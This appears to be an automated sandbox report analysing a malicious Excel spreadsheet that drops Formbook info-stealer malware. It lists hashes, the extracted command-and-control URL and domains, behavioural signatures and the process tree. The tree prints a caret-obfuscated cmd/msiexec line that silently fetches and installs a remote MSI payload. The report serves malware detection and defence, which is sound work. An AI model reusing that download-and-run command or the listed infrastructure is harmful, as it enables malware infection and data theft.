Analysis
-
max time kernel
149s -
max time network
136s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
07-05-2021 11:40
General
-
Target
814e1a31a6bff8df45a6393430e9c0b7bbaddafc.xls
-
Size
37KB
-
MD5
ccaacde2a2fea467aacb4d46c0f6d92a
-
SHA1
814e1a31a6bff8df45a6393430e9c0b7bbaddafc
-
SHA256
c2c6534ff0fbb2099535e54323aec998d82de2811f6fd82337927c9d866e01f4
-
SHA512
6592b22bb684fa3a47f33f666c6a3af666b59052adbce1088dfa9031b1f862328ba3d533f03abd3e47fe34d5d05db2873feeec8dae7d08c23bc88cb51b4c19ee
Malware Config
Extracted
formbook
4.1
http://www.111bjs.com/ccr/
abdullahlodhi.com
jevya.com
knoxvillerestaurant.com
mekarauroko7389.com
cricketspowder.net
johannchirinos.com
orangeorganical.com
libero-tt.com
lorenaegianluca.com
wintab.net
modernmillievintage.com
zgdqcyw.com
jeffabildgaardmd.com
nurulfikrimakassar.com
findyourchef.com
innovationsservicegroup.com
destek-taleplerimiz.com
whfqqco.icu
kosmetikmadeingermany.com
dieteticos.net
Signatures
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Formbook Payload 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 1 IoCs
-
Use of msiexec (install) with remote resource 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 9 IoCs
-
Modifies data under HKEY_USERS 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious behavior: MapViewOfSection 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 50 IoCs
-
Suspicious use of FindShellTrayWindow 6 IoCs
-
Suspicious use of SendNotifyMessage 4 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\814e1a31a6bff8df45a6393430e9c0b7bbaddafc.xls2⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/556791.msi /qn3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemSiExec /i http://farm-finn.com/admin/556791.msi /qn4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"2⤵
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\SysWOW64\cmstp.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Installer\MSIABFB.tmp"3⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSIABFB.tmp"C:\Windows\Installer\MSIABFB.tmp"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\Installer\MSIABFB.tmp"C:\Windows\Installer\MSIABFB.tmp"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\Installer\MSIABFB.tmpMD5
2b1cb416ade4d567beae5b90f78881a6
SHA1bb6cfc2f205a922620eeca38406e9ca2ff2875bf
SHA256ac2bc57ced40d79ee9507ee3259682c9a545a1290c2dbd4e0a5045b1ae5e61f3
SHA512f96dc90e2ef21cb6ce5334d4b3b1043b51862fb9686afdc41da95188d653f6f69d013b62c9301425b95f16e259a4d672e39418c8a849dd5b9b98e20a18853a09
-
C:\Windows\Installer\MSIABFB.tmpMD5
2b1cb416ade4d567beae5b90f78881a6
SHA1bb6cfc2f205a922620eeca38406e9ca2ff2875bf
SHA256ac2bc57ced40d79ee9507ee3259682c9a545a1290c2dbd4e0a5045b1ae5e61f3
SHA512f96dc90e2ef21cb6ce5334d4b3b1043b51862fb9686afdc41da95188d653f6f69d013b62c9301425b95f16e259a4d672e39418c8a849dd5b9b98e20a18853a09
-
C:\Windows\Installer\MSIABFB.tmpMD5
2b1cb416ade4d567beae5b90f78881a6
SHA1bb6cfc2f205a922620eeca38406e9ca2ff2875bf
SHA256ac2bc57ced40d79ee9507ee3259682c9a545a1290c2dbd4e0a5045b1ae5e61f3
SHA512f96dc90e2ef21cb6ce5334d4b3b1043b51862fb9686afdc41da95188d653f6f69d013b62c9301425b95f16e259a4d672e39418c8a849dd5b9b98e20a18853a09
-
\Users\Admin\AppData\Local\Temp\nsnACC4.tmp\ie2mi.dllMD5
7795b5a3842f3220526b9b5c0792c91a
SHA169d6e1a264aab15d749a70a74d63de59c266e3b4
SHA2567d931a93e761686bde7d6a79253cb03378ee28f8d12c683a9017540e798d2988
SHA51245bf7270aee9e4ccbd84107490469e455ac4bc6faac7e1aff9cc4453c9c07afc8e64dbef955e248116d28f49b51f6596812d8366ed057ddc73ab061aecfcc43e
-
memory/736-60-0x000000002FAC1000-0x000000002FAC4000-memory.dmpFilesize
12KB
-
memory/736-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/736-61-0x00000000716A1000-0x00000000716A3000-memory.dmpFilesize
8KB
-
memory/908-67-0x0000000000000000-mapping.dmp
-
memory/908-74-0x00000000007D0000-0x00000000007D2000-memory.dmpFilesize
8KB
-
memory/1168-83-0x0000000000000000-mapping.dmp
-
memory/1204-78-0x00000000041D0000-0x00000000042DB000-memory.dmpFilesize
1.0MB
-
memory/1204-86-0x0000000004B00000-0x0000000004BBD000-memory.dmpFilesize
756KB
-
memory/1220-63-0x0000000000000000-mapping.dmp
-
memory/1420-64-0x0000000000000000-mapping.dmp
-
memory/1420-65-0x0000000075891000-0x0000000075893000-memory.dmpFilesize
8KB
-
memory/1544-72-0x000000000041EBB0-mapping.dmp
-
memory/1544-76-0x0000000000890000-0x0000000000B93000-memory.dmpFilesize
3.0MB
-
memory/1544-77-0x0000000000340000-0x0000000000354000-memory.dmpFilesize
80KB
-
memory/1544-75-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/1640-66-0x000007FEFBEA1000-0x000007FEFBEA3000-memory.dmpFilesize
8KB
-
memory/1688-82-0x00000000000F0000-0x000000000011E000-memory.dmpFilesize
184KB
-
memory/1688-81-0x0000000000770000-0x0000000000788000-memory.dmpFilesize
96KB
-
memory/1688-84-0x0000000002040000-0x0000000002343000-memory.dmpFilesize
3.0MB
-
memory/1688-85-0x0000000000550000-0x00000000005E3000-memory.dmpFilesize
588KB
-
memory/1688-79-0x0000000000000000-mapping.dmp